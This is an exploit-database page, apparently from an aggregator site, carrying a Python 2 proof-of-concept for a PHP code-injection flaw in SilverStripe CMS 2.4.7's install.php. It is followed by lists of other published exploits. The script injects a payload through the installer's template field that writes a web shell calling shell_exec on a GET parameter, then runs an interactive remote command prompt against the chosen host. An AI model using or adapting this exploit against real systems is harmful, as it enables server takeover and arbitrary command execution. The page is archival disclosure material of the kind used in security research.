Search for hundreds of thousands of exploits

"SilverStripe CMS 2.4.7 - 'install.php' PHP Code Injection"

Author

Exploit author

"Mehmet Ince"

Platform

Exploit platform

php

Release date

Exploit published date

2012-04-27

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
# source: https://www.securityfocus.com/bid/53282/info
# 
# SilverStripe is prone to a remote PHP code-injection vulnerability.
# 
# An attacker can exploit this issue to inject and execute arbitrary PHP code in the context of the affected application. This may facilitate a compromise of the application and the underlying system; other attacks are also possible.
# 
# SilverStripe 2.4.7 is vulnerable; other versions may also be affected. 
# 

#!/usr/bin/env python
# -*- coding:utf-8 -*-
import httplib, urllib, urllib2,sys, getopt
 
def Menu():
    print "\n\n-------------------------------------------------------"
    print "-Kullanim Klavuzu [ USAGE ]               "
    print "-------------------------------------------------------"
    print "- Temel Kullanim - I [ Default Usage ] :                  "
    print "-        python exo.py www.target.com /            \n"
    print "- Temel Kullanim - II [ Default Usage ] :                 "
    print "-        python exo.py www.target.com /path/          \n"
if (len(sys.argv) <= 2) or (len(sys.argv) > 3):
    Menu()
    exit(1)
host = sys.argv[1]
path = sys.argv[2]
 
print " [+] Exploit ediliyor..!"
payload="blackcandy');fwrite(fopen("
payload+='"../shellcik.php","w"), '
payload+="'<?php $gelen"
payload+='=@$_GET["gelen"]; echo shell_exec($gelen);?>'
parametreler = urllib.urlencode({'db[type]':'MySQLDatabase',
'db[MySQLDatabase][server]':'localhost',
'db[MySQLDatabase][username]':'root',
'db[MySQLDatabase][password]':'qwe123',
'db[MySQLDatabase][database]':'SS_mysite',
'db[MSSQLDatabase][server]':'localhost',
'db[MSSQLDatabase][username]':'root',
'db[MSSQLDatabase][password]':'qwe123',
'db[MSSQLDatabase][database]':'SS_mysite',
'db[PostgreSQLDatabase][server]':'localhost',
'db[PostgreSQLDatabase][username]':'root',
'db[PostgreSQLDatabase][password]':'qwe123',
'db[PostgreSQLDatabase][database]':'SS_mysite',
'db[SQLiteDatabase][path]':'/var/www/SilverStripe/assets/.db',
'db[SQLiteDatabase][database]':'SS_mysite',
'admin[username]':'admin',
'admin[password]':'qwe123',
'locale':'en_US',
'template':payload,
'stats':'on',
'go':'Installing SilverStripe...'})
print " [+]Parametreler olusturuldu [ Params Generated For Http Request ]"
basliklar = {"Content-type": "application/x-www-form-urlencoded",
             "Accept": "text/plain",
             "User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:11.0) Gecko/20100101 Firefox/11.0",
             "Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
             "Accept-Language":"en-us,en;q=0.5",
             "Accept-Encoding":"gzip, deflate",
             "Connection":"keep-alive",
             "Referer":"http://" + host + path+"install.php",
             "Cookie":"alc_enc=1%3Aa9dbf14198a8f6bd9dd2d2c3e41e7164fb206d76; PastMember=1; PHPSESSID=0d7k4e661jd96i0u64vij68am3; phpbb3_srzvs_k=; phpbb3_srzvs_u=2; phpbb3_srzvs_sid=ede0a17fc1f375d6a633f291119c92d7; style_cookie=null; PHPSESSID=j7nr6uro3jc5tulodfeoum3u90; fws_cust=mince%232%23d41d8cd98f00b204e9800998ecf8427e"
}
print " [+]Basliklar olusturuldu [ Headers Generated For Http Request ]"
conn = httplib.HTTPConnection("localhost:80")
conn.request("POST",str(path) +"install.php",parametreler,basliklar)
responce = conn.getresponse()
if responce.status != 200:
    print "[+]Http Hatasi : " + responce.status + "\n"
    print "Cant Exploit!:("
if responce.status == 200:
    komut=""
    while( komut != "exit" ):
        komut = urllib.quote_plus(str(raw_input("Shell :) => ")))
        print urllib2.urlopen("http://" + host + path+"shellcik.php?gelen="+komut).read()
Release DateTitleTypePlatformAuthor
2020-09-18"Mantis Bug Tracker 2.3.0 - Remote Code Execution (Unauthenticated)"webappsphp"Nikolas Geiselman"
2020-09-16"Piwigo 2.10.1 - Cross Site Scripting"webappsphpIridium
2020-09-15"ThinkAdmin 6 - Arbitrarily File Read"webappsphpHzllaga
2020-09-15"Tailor MS 1.0 - Reflected Cross-Site Scripting"webappsphpboku
2020-09-14"Joomla! paGO Commerce 2.5.9.0 - SQL Injection (Authenticated)"webappsphp"Mehmet Kelepçe"
2020-09-10"CuteNews 2.1.2 - Remote Code Execution"webappsphp"Musyoka Ian"
2020-09-09"Tailor Management System - 'id' SQL Injection"webappsphpMosaaed
2020-09-07"grocy 2.7.1 - Persistent Cross-Site Scripting"webappsphp"Mufaddal Masalawala"
2020-09-03"BloodX CMS 1.0 - Authentication Bypass"webappsphpBKpatron
2020-09-03"Daily Tracker System 1.0 - Authentication Bypass"webappsphp"Adeeb Shah"
Release DateTitleTypePlatformAuthor
2020-07-14"Trend Micro Web Security Virtual Appliance 6.5 SP2 Patch 4 Build 1901 - Remote Code Execution (Metasploit)"webappsmultiple"Mehmet Ince"
2020-04-06"Vesta Control Panel 0.9.8-26 - Authenticated Remote Code Execution (Metasploit)"webappsmultiple"Mehmet Ince"
2019-01-07"Mailcleaner - Authenticated Remote Code Execution (Metasploit)"remotepython"Mehmet Ince"
2018-07-24"Micro Focus Secure Messaging Gateway (SMG) < 471 - Remote Code Execution (Metasploit)"webappsphp"Mehmet Ince"
2018-06-26"Liferay Portal < 7.0.4 - Server-Side Request Forgery"webappsjava"Mehmet Ince"
2018-03-12"ManageEngine Applications Manager 13.5 - Remote Code Execution (Metasploit)"webappsjava"Mehmet Ince"
2018-01-04"Xplico - Remote Code Execution (Metasploit)"remotelinux"Mehmet Ince"
2017-10-11"Trend Micro InterScan Messaging Security (Virtual Appliance) - 'Proxy.php' Remote Code Execution (Metasploit)"webappsphp"Mehmet Ince"
2017-10-11"Trend Micro OfficeScan 11.0/XG (12.0) - Remote Code Execution (Metasploit)"webappsphp"Mehmet Ince"
2017-09-19"DenyAll WAF < 6.3.0 - Remote Code Execution (Metasploit)"webappslinux"Mehmet Ince"
2017-09-12"osTicket 1.10 - SQL Injection (PoC)"webappsphp"Mehmet Ince"
2017-06-26"Symantec Messaging Gateway 10.6.2-7 - Remote Code Execution (Metasploit)"remotepython"Mehmet Ince"
2017-05-09"Crypttech CryptoLog - Remote Code Execution (Metasploit)"remotepython"Mehmet Ince"
2017-03-24"Logsign 4.4.2/4.4.137 - Remote Command Injection (Metasploit)"remotepython"Mehmet Ince"
2017-03-17"SolarWinds LEM 6.3.1 - Remote Code Execution (Metasploit)"remotelinux"Mehmet Ince"
2017-01-31"AlienVault OSSIM/USM < 5.3.1 - Remote Code Execution (Metasploit)"webappsphp"Mehmet Ince"
2017-01-15"Trend Micro InterScan Messaging Security (Virtual Appliance) < 9.1.-1600 - Remote Code Execution (Metasploit)"webappsmultiple"Mehmet Ince"
2017-01-08"ManagEnegine ADManager Plus 6.5.40 - Multiple Vulnerabilities"webappsjava"Mehmet Ince"
2016-09-21"Kaltura 11.1.0-2 - Remote Code Execution (Metasploit)"remotephp"Mehmet Ince"
2016-07-25"Drupal Module CODER 2.5 - Remote Command Execution (Metasploit)"webappsphp"Mehmet Ince"
2016-07-20"Drupal Module RESTWS 7.x - PHP Remote Code Execution (Metasploit)"remotephp"Mehmet Ince"
2016-07-11"Tiki Wiki 15.1 - File Upload (Metasploit)"remotephp"Mehmet Ince"
2016-06-27"BigTree CMS 4.2.11 - SQL Injection"webappsphp"Mehmet Ince"
2016-06-15"BookingWizz Booking System < 5.5 - Multiple Vulnerabilities"webappsphp"Mehmet Ince"
2016-05-24"AfterLogic WebMail Pro ASP.NET 6.2.6 - Administrator Account Disclosure via XML External Entity Injection"webappsasp"Mehmet Ince"
2014-04-24"Bonefire 0.7.1 - Reinstall Admin Account"webappsphp"Mehmet Ince"
2014-04-22"No-CMS 0.6.6 rev 1 - Admin Account Hijacking / Remote Code Execution via Static Encryption Key"webappsphp"Mehmet Ince"
2012-05-01"WordPress Plugin Zingiri Web Shop 2.4.2 - Persistent Cross-Site Scripting"webappsphp"Mehmet Ince"
2012-04-27"SilverStripe CMS 2.4.7 - 'install.php' PHP Code Injection"webappsphp"Mehmet Ince"
2012-04-26"WordPress Plugin Zingiri Web Shop 2.4.0 - Multiple Cross-Site Scripting Vulnerabilities"webappsphp"Mehmet Ince"
import requests
response = requests.get('https://www.nmmapper.com/api/v1/exploitdetails/37116/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.